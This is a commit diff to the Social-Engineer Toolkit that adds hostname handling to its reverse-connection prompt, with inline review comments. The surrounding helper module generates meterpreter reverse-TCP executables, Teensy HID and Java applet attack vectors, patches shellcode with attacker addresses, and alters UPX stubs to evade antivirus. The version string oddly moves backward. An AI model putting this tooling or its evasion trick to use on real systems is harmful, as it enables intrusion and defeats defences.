Added better handling around hostnames and IP addresses

trustedsec 2013-01-19 09:49:36 -05:00
parent 99ed445be4
commit 54e8616e0c
3 changed files with 67 additions and 56 deletions


@ -4,6 +4,8 @@ version 4.3.10
* Fixed a bug that would cause README to error out (thanks Chris Barrow).
* Added the ability to use hostnames with payloads including pyinjector and multiinjector
* Added better handling of hostnames when not specifying an IP address
* Added better handling around if an IP address is typed in wrong on web cloning
~~~~~~~~~~~~~~~~
version 4.3.9


@ -307,8 +307,18 @@ try:
if nat_or_fwd == "NO":
print_info("Enter the IP address of your interface IP or if your using an external IP, what")
print_info("will be used for the connection back and to house the web server (your interface address)")
ipaddr = raw_input(setprompt(["2"], "IP address for the reverse connection"))
ipaddr = raw_input(setprompt(["2"], "IP address or hostname for the reverse connection"))
# here we check if they are using a hostname else we loop through until they have a legit one
if validate_ip(ipaddr) == False:
while 1:
choice = raw_input(setprompt(["2"], "This is not an IP address. Are you using a hostname? [y/n] "))
if choice == "" or choice.lower() == "y":
print_status("Roger that. Using hostnames moving forward..")
break
else:
ipaddr = raw_input(setprompt(["2"], "IP address for the reverse connection"))
if validate_ip(ipaddr) == True: break
if attack_vector == "harvester" or attack_vector == "tabnabbing" or attack_vector == "webjacking":
print_info("This option is used for what IP the server will POST to.")
print_info("If you're using an external IP, use your external IP for this")
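Review bot: Answering y, or just pressing Enter, at the new "Are you using a hostname?" prompt accepts whatever was typed for `ipaddr` with no further check, so an empty string or a mistyped address such as a three-octet IP is carried forward as a hostname. Since the changelog describes this change as better handling of mistyped addresses, the accept branch should at least require an explicit answer and a non-empty value, e.g. `if choice.lower() in ("y", "yes") and ipaddr.strip() != "":`, and ideally match the value against a hostname pattern before breaking out of the loop. Other code on this page builds command strings for `subprocess.Popen(..., shell=True)`; whether `ipaddr` ever reaches such a call is not visible here, but restricting it to hostname characters at this prompt would rule that out. The enclosing `try:` block starts outside the hunk.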


@ -2,7 +2,7 @@
##############################################
#
# Centralized classes, work in progress
#
#
##############################################
import re
import sys
@ -72,7 +72,7 @@ if check_os() == "posix":
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
# if we are windows or something like that then define colors as nothing
else:
class bcolors:
@ -115,7 +115,7 @@ else:
self.backWhite = ''
self.DARKCYAN = ''
# this will be the home for the set menus
# this will be the home for the set menus
def setprompt(category, text):
# if no special prompt and no text, return plain prompt
if category == '0' and text == "":
@ -148,7 +148,7 @@ def setprompt(category, text):
def yesno_prompt(category,text):
valid_response = False
while not valid_response:
while not valid_response:
response = raw_input(setprompt(category,text))
response = str.lower(response)
if response == "no" or response == "n":
@ -215,7 +215,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
define_version = '4.3.10'
define_version = '4.3.9'
return define_version
class create_menu:
@ -225,10 +225,10 @@ class create_menu:
print text
#print "\nType 'help' for information on this module\n"
for i, option in enumerate(menu):
menunum = i + 1
# Check to see if this line has the 'return to main menu' code
match = re.search("0D", option)
match = re.search("0D", option)
# If it's not the return to menu line:
if not match:
if menunum < 10:
@ -246,13 +246,12 @@ def validate_ip(address):
debug_msg("setcore","this is a valid IP address",5)
return True
else:
print_error("(hint) there seems to be some octets missing...")
print_error("This is not a valid IP address...")
raise socket.error
else:
raise socket_error
except socket.error:
print_error("Invalid address format. Please enter a valid IPv4 address")
return False
#
@ -410,7 +409,7 @@ def check_beautifulsoup():
subprocess.Popen("rm -rf BeautifulSoup-*", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Finished... Relaunch SET, if it doesn't work for you, install manually.")
sys.exit(1)
if answer == "NO":
sys.exit()
else:
@ -455,7 +454,7 @@ def check_mssql():
else:
print_error("ERROR:Invalid response, exiting the Social-Engineer Toolkit...")
sys.exit(1)
#
#
# cleanup old or stale files
#
def cleanup_routine():
@ -573,7 +572,7 @@ def site_cloner(website, exportpath, *args):
# inherit the AUTO_DETECT=ON or OFF configuration.
#
# usage: metasploit_reverse_tcp_exe(portnumber)
#
#
def meterpreter_reverse_tcp_exe(port):
ipaddr = grab_ipaddress()
@ -604,7 +603,7 @@ def meterpreter_reverse_tcp_exe(port):
random_value = generate_random_string(5, 10)
# copy the created executable to program_junk
print_status("Executable created under src/program_junk/%s.exe" % (random_value))
subprocess.Popen("cp src/html/msf.exe src/program_junk/%s.exe" % (random_value), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp src/html/msf.exe src/program_junk/%s.exe" % (random_value), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
#
# Start a metasploit multi handler
#
@ -682,7 +681,7 @@ def java_applet_attack(website, port, directory):
filename = check_options("MSF.EXE=")
if check_options != 0:
#if os.path.isfile("src/program_junk/rand_gen"):
# move the file to the specified directory and filename
subprocess.Popen("cp src/html/msf.exe %s/%s" % (directory,filename), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
@ -719,7 +718,7 @@ def teensy_pde_generator(attack_method):
filewrite = file("reports/powershell_down.pde", "w")
teensy_string = ("Successfully generated Teensy HID Attack Vector under reports/powershell_down.pde")
# if we are doing the attack vector teensy
# if we are doing the attack vector teensy
if attack_method == "powershell_reverse":
# specify the filename
filename = file("src/teensy/powershell_reverse.pde", "r")
@ -733,7 +732,7 @@ def teensy_pde_generator(attack_method):
filewrite = file("reports/java_applet.pde", "w")
teensy_string = ("Successfully generated Teensy HID Attack Vector under reports/java_applet.pde")
# if we are doing the attack vector teensy
# if we are doing the attack vector teensy
if attack_method == "wscript":
# specify the filename
filename = file("src/teensy/wscript.pde", "r")
@ -758,7 +757,7 @@ def teensy_pde_generator(attack_method):
print_status(teensy_string)
#
# Expand the filesystem windows directory
#
#
def windows_root():
return os.environ['WINDIR']
@ -768,7 +767,7 @@ def windows_root():
#
def log(error):
# open log file only if directory is present (may be out of directory for some reason)
if not os.path.isfile("%s/src/logs/set_logfile.log" % (definepath)):
if not os.path.isfile("%s/src/logs/set_logfile.log" % (definepath)):
filewrite = file("%s/src/logs/set_logfile.log" % (definepath), "w")
filewrite.write("")
filewrite.close()
@ -792,7 +791,7 @@ def upx(path_to_file):
match = re.search("UPX_PATH=", line)
if match:
upx_path = line.replace("UPX_PATH=", "")
# if it isn't there then bomb out
if not os.path.isfile(upx_path):
print_warning("UPX was not detected. Try configuring the set_config again.")
@ -804,14 +803,14 @@ def upx(path_to_file):
subprocess.Popen("%s -9 -q -o src/program_junk/temp.binary %s" % (upx_path, path_to_file), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# move it over the old file
subprocess.Popen("mv src/program_junk/temp.binary %s" % (path_to_file), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# random string
random_string = generate_random_string(3,3).upper()
# 4 upx replace - we replace 4 upx open the file
fileopen = file(path_to_file, "rb")
filewrite = file("src/program_junk/temp.binary", "wb")
# read the file open for data
data = fileopen.read()
# replace UPX stub makes better evasion for A/V
@ -831,11 +830,11 @@ def show_banner(define_version,graphic):
show_graphic()
else:
os.system("clear")
print bcolors.BLUE + """
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Turbulence""" + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@trustedsec""" + bcolors.BLUE+""" [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@dave_rel1k""" + bcolors.BLUE+""" [---]
@ -843,7 +842,7 @@ def show_banner(define_version,graphic):
""" + bcolors.GREEN+""" Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.
"""
"""
print bcolors.BLUE + """ Join us on irc.freenode.net in channel #setoolkit\n""" + bcolors.ENDC
print bcolors.BOLD + """ The Social-Engineer Toolkit is a product of TrustedSec.\n\n Visit: """ + bcolors.GREEN + """https://www.trustedsec.com\n""" + bcolors.ENDC
@ -853,28 +852,28 @@ def show_graphic():
print bcolors.YELLOW + r"""
.--. .--. .-----.
: .--': .--'`-. .-'
`. `. : `; : :
_`, :: :__ : :
`. `. : `; : :
_`, :: :__ : :
`.__.'`.__.' :_; """ + bcolors.ENDC
return
if menu == 3:
print bcolors.GREEN + r"""
_______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\/ \/ """ + bcolors.ENDC
return
if menu == 4:
print bcolors.BLUE + r"""
print bcolors.BLUE + r"""
:::=== :::===== :::====
::: ::: :::====
===== ====== ===
=== === ===
====== ======== ===
===== ====== ===
=== === ===
====== ======== ===
""" + bcolors.ENDC
if menu == 5:
@ -890,21 +889,21 @@ def show_graphic():
if menu == 6:
print bcolors.PURPLE + r'''
.M"""bgd `7MM"""YMM MMP""MM""YMM
,MI "Y MM `7 P' MM `7
`MMb. MM d MM
`YMMNq. MMmmMM MM
. `MM MM Y , MM
Mb dM MM ,M MM
.M"""bgd `7MM"""YMM MMP""MM""YMM
,MI "Y MM `7 P' MM `7
`MMb. MM d MM
`YMMNq. MMmmMM MM
. `MM MM Y , MM
Mb dM MM ,M MM
P"Ybmmd" .JMMmmmmMMM .JMML.''' + bcolors.ENDC
return
if menu == 7:
print bcolors.YELLOW + r"""
print bcolors.YELLOW + r"""
________________________
__ ___/__ ____/__ __/
_____ \__ __/ __ /
____/ /_ /___ _ /
_____ \__ __/ __ /
____/ /_ /___ _ /
/____/ /_____/ /_/ """ + bcolors.ENDC
return
@ -962,7 +961,7 @@ def set_check():
for line in fileopen:
match = re.search("SET_INTERACTIVE_SHELL=OFF", line)
# if we turned it off then we return a true else return false
if match:
if match:
return True
match1 = re.search("SET_INTERACTIVE_SHELL=ON", line)
# return false otherwise
@ -1019,7 +1018,7 @@ def check_length(choice,max):
choice = int(choice)
# if everythings good return the right choice
return choice
# oops, not a integer
# oops, not a integer
except Exception:
counter = 1
@ -1086,7 +1085,7 @@ def is_valid_ipv6(ip):
| (?<!:) #
| (?<=:) (?<!::) : #
) # OR
| # A v4 address with NO leading zeros
| # A v4 address with NO leading zeros
(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
(?: \.
(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
@ -1131,7 +1130,7 @@ def copyfolder(sourcePath, destPath):
#figure out where we're going
dest = destPath + root.replace(sourcePath, '')
#if we're in a directory that doesn't exist in the destination folder
#then create a new folder
if not os.path.isdir(dest):
@ -1155,7 +1154,7 @@ def copyfolder(sourcePath, destPath):
# this routine will be used to check config options within the set.options
def check_options(option):
# open the directory
trigger = 0
trigger = 0
fileopen = file("%s/src/program_junk/set.options" % (definepath), "r").readlines()
for line in fileopen:
match = re.search(option, line)
@ -1163,7 +1162,7 @@ def check_options(option):
line = line.rstrip()
line = line.replace('"', "")
line = line.split("=")
return line[1]
return line[1]
trigger = 1
if trigger == 0: return trigger
@ -1178,7 +1177,7 @@ def update_options(option):
filewrite = file("%s/src/program_junk/set.options" % (definepath), "a")
filewrite.write(option + "\n")
filewrite.close()
# python socket listener
def socket_listener(port):
port = int(port) # needed integer for port
@ -1330,7 +1329,7 @@ def shellcode_replace(ipaddr, port, shellcode):
# getting everything into the right format
if len(port) > 4:
port = "\\x00" + port
# if we are using a low number like 21, 23, etc.
# if we are using a low number like 21, 23, etc.
if len(port) == 4:
port = "\\x00\\x00" + port
shellcode = shellcode.replace(r"\x00\x01\xbb", port)
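Review bot: In the validate_ip hunk (`@ -246,13 +246,12`) the unchanged line `raise socket_error` uses a name that is not `socket.error`; unless `socket_error` is defined outside the visible hunks, reaching that branch raises NameError, which `except socket.error:` does not catch, so the function would abort instead of returning False. The hostname prompt added elsewhere in this commit relies on `validate_ip(ipaddr) == False` for anything that is not an IPv4 address, so the line is worth correcting in the same change: `raise socket.error`. A short docstring on validate_ip saying that it returns True only for a four-octet dotted address and False otherwise would also make that contract explicit for callers. The function starts above the hunk, so the condition guarding this branch is not visible here.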